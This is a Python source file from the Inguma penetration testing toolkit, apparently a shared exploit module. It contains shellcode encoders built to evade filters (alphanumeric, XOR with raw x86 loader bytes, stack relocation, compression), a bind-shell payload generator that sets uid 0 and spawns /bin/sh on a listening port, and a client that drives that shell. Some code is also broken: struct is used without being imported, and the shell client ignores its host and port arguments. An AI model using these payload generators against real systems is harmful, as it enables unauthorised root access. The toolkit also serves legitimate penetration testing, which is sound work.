1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342
|
#!/usr/bin/python
"""
Inguma Penetration Testing Toolkit
Copyright (c) 2006, 2007 Joxean Koret, joxeankoret [at] yahoo.es
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; version 2
of the License.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
import os
import sys
import time
import socket
import interactive
from pyshellcodelib import pyshellcodelib
"""
The following functions are extracted from the fantastic Shellforge project (which is also GPL).
Copyright (C) 2003 Philippe Biondi <phil@secdev.org>
"""
def mkcpl(x):
x = ord(x)
set="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
for c in set:
d = ord(c)^x
if chr(d) in set:
return 0,c,chr(d)
if chr(0xff^d) in set:
return 1,c,chr(0xff^d)
raise Exception,"No encoding found for %#02x"%x
def x86AlphaEncode(shcode):
s="hAAAAX5AAAAHPPPPPPPPa"
shcode=list(shcode)
shcode.reverse()
shcode = "".join(shcode)
shcode += "\x90"*((-len(shcode))%4)
for b in range(len(shcode)/4):
T,C,D = 0,"",""
for i in range(4):
t,c,d = mkcpl(shcode[4*b+i])
T += t << i
C = c+C
D = d+D
s += "h%sX5%sP" % (C,D)
if T > 0:
s += "TY"
T = (2*T^T)%16
for i in range(4):
if T & 1:
s += "19"
T >>= 1
if T == 0:
break
s += "I"
return s+"T\xc3"
def x86XorEncode(shcode, avoid="\x00"):
avd = []
for a in avoid.split(","):
if a.startswith("0x") and len(a) == 4:
avd.append(int(a[2:],16))
else:
avd += map(lambda x: ord(x),list(a))
needloader=0
for c in avd:
if chr(c) in shcode:
needloader=1
break
if not needloader:
return shcode
for i in range(64,256)+range(1,64):
ok=1
for c in avd:
if chr(c^i) in shcode:
ok=0
break
if ok:
key=i
break
if not ok:
raise "xor loader: no suitable xor key found."
shcode = "".join(map(lambda x: chr(ord(x)^key), shcode))
length = len(shcode)
if length < 0x100:
ld = ("\xeb\x0e\x90\x5e\x31\xc9\xb1"+chr(length)+"\x80\x36"+
chr(key)+"\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff")
else:
if length & 0xff == 0:
length += 1
ld = ("\xeb\x0f\x5e\x31\xc9\x66\xb9"+
chr(length&0xff)+chr(length>>8)+
"\x80\x36"+chr(key)+
"\x46\xe2\xfa\xeb\x05\xe8\xec\xff\xff\xff")
ok=1
for c in avd:
if chr(c) in ld:
ok=0
break
if not ok:
raise "xor loader: no suitable xor loader found"
return ld+shcode
def x86StackRelocEncode(shcode,smart=1):
loader = ("\x58"+ # pop %eax
"\xe8\x00\x00\x00\x00"+ # call +0
"\x5b"+ # pop %ebx
"\x50"+ # push %eax
"\x83\xc3\xfa") # add $0xfffffffa,%ebx
if smart != "0":
loader += (
"\x89\xd8"+ # mov %ebx,%eax
"\x31\xe0"+ # xor %esp,%eax
"\xc1\xe8\x10"+ # shr $0x10,%eax
"\x85\xc0"+ # test %eax,%eax
"\x75\x02") # jne +2
loader += "\x89\xdc" # mov %ebx,%esp
return loader+shcode
def x86CompressEncode(shcode, histo='5',length='2'):
loader = "\xeb\x38\x5e\x46\xfc\xad\x89\xc1\x89\xf7\x01\xcf\x31\xc0\xac\xa8\x80\x78\x05\xaa\xe2\xf8\xeb\x27\x3d\xff\x00\x00\x00\x75\x03\xac\xe2\xf1\x51\x56\x89\xc1\x24\x1f\x89\xfe\x29\xc6\x80\xe1\x7f\xc0\xe9\x05\xf3\xa4\x5e\x59\xe2\xd6\xeb\x05\xe8\xc3\xff\xff\xff\xe9" # compress.nasm r44
comp = ""
histo = int(histo,0)
length = int(length,0)
if histo != 5 or length != 2:
print "Compress: only works for histo and length default values"
print "Compress: histo=%i length=%i" % (histo, length)
i = 0
while i < len(shcode):
c = shcode[i]
if ord(c)&0x80:
c = "\xff"+c
j = min(2**length-1, i, len(shcode)-i+1)
while j > 0:
p = shcode[:i].rfind(shcode[i:i+j])
if p >= 0 and p >= i-2**histo:
print "Compress: found @%i %i %r in %r" % (i,p-i, shcode[i:i+j],shcode[max(0,i-2**histo):i])
c = chr(0x80|(j<<histo)|(i-p))
i += j-1
break
j -= 1
comp += c
i += 1
comp = loader+struct.pack("I",len(comp))+comp
print "Compress: [%i bytes] ==(C)==> [%i bytes]" % (len(shcode), len(comp))
return comp
"""
End of Shellforge extracted functions
"""
def spawnTerminal(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 4444))
print "[+] Connected (enter commands)"
prompt = ""
while 1:
try:
cmd = raw_input(prompt)
except KeyboardInterrupt:
print "Exit"
break
if cmd.lower().strip(" ") == "":
pass
elif cmd.lower() != "exit":
s.send(cmd + "\n\0")
while 1:
line = s.recv(512)
sys.stdout.write(line)
sys.stdout.flush()
if len(line) < 512:
break
else:
return
cmd = ""
s.close()
def getShellcode(connect_addr, connect_port, ostype = 1, payload = 2):
print "Getting shellcode for %s:%d with os type %d and payload %d" % (connect_addr, connect_port, ostype, payload)
if payload == 1:
raise "Not yet implemented"
elif payload == 2:
ret = bindShell(connect_addr, connect_port, ostype)
else:
raise "Not yet implemented"
return ret
def getSyscallType(ostype = 1):
if ostype == 1:
syscallType = "linux"
elif ostype == 2:
syscallType = "freebsd"
elif ostype == 3:
syscallType = "openbsd"
elif ostype == 4:
syscallType = "solaris"
else:
syscallType = "linux"
return syscallType
def bindShell(listen_addr, listen_port, ostype = 1):
a = pyshellcodelib.PyEgg(getSyscallType(ostype), "x86")
# Change to root
a.setuid(0)
a.setgid(0)
# Listen in all available addresses at port 31337
a.socket(socket.AF_INET, socket.SOCK_STREAM)
a.bind(listen_port)
a.listen()
# Got a connection, duplicate fd descriptors
a.accept()
a.dup2(2)
a.dup2(1)
a.dup2(0)
# Run /bin/sh
a.execSh()
sc = a.getEgg()
return sc
def genString(size):
buf = ""
for i in range(1, size):
buf += str(i)
if len(buf) >= size:
break
return buf[0:1024]
class CIngumaModule:
target = ""
ports = []
sport = 1025
closed = {}
opened = {}
mac = {}
services = {}
waitTime = 0
randomizeWaitTime = False
timeout = 1
iface = "eth0"
results = {}
dict = None
interactive = True
""" The following are used ONLY for exploits (shellcode) """
command = ""
listenPort = 4444
ostype = 1
payload = "bindshell"
def addToDict(self, element, value):
""" It's used to add data to the knowledge base to be used, i.e., by other modules """
if value == None:
return
if self.dict is not None:
if self.dict.has_key(element):
for x in self.dict[element]:
if x == value:
return
self.dict[element] += [value]
else:
self.dict[element] = [value]
def getPasswordList(self):
fname = self.dict["base_path"]
if fname != "" :
fname += os.sep + "data" + os.sep + "dict"
else:
fname = "data" + os.sep + "dict"
f = file(fname, "r")
return f.readlines()
def resolveTarget(objExploit):
try:
if objExploit.selected != "" and objExploit.selected is not None:
return objExploit.selected
except:
pass
try:
x = objExploit.targets
except:
return None
i = 0
mlist = {}
for x in objExploit.targets:
i = i + 1
mlist[str(i)] = x
print "%d) %s" % (i, x)
print
try:
selected = raw_input("Select target: ")
if mlist.has_key(selected):
return mlist[selected]
else:
for x in objExploit.targets:
if x.lower().find(selected) > -1:
return x
except:
return
|